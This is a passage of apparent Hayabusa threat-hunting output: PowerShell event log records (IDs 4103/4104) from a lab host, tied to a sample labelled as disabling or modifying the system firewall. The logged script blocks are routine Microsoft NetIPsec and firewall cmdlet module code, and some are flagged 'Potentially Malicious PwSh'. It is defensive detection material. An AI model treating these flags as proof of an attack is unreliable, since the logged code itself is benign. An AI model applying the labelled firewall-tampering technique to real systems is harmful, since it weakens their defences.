(cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecQuickModeCryptoSet' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecQuickModeCryptoSet' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.330 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.330 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.331 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.331 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.331 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.332 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.332 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.333 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.381 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.386 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.386 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallProfile"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.387 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallProfile"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.418 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecDeltaCollection' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.418 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecDeltaCollection' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.419 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.419 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.444 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecDoSPSetting' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] 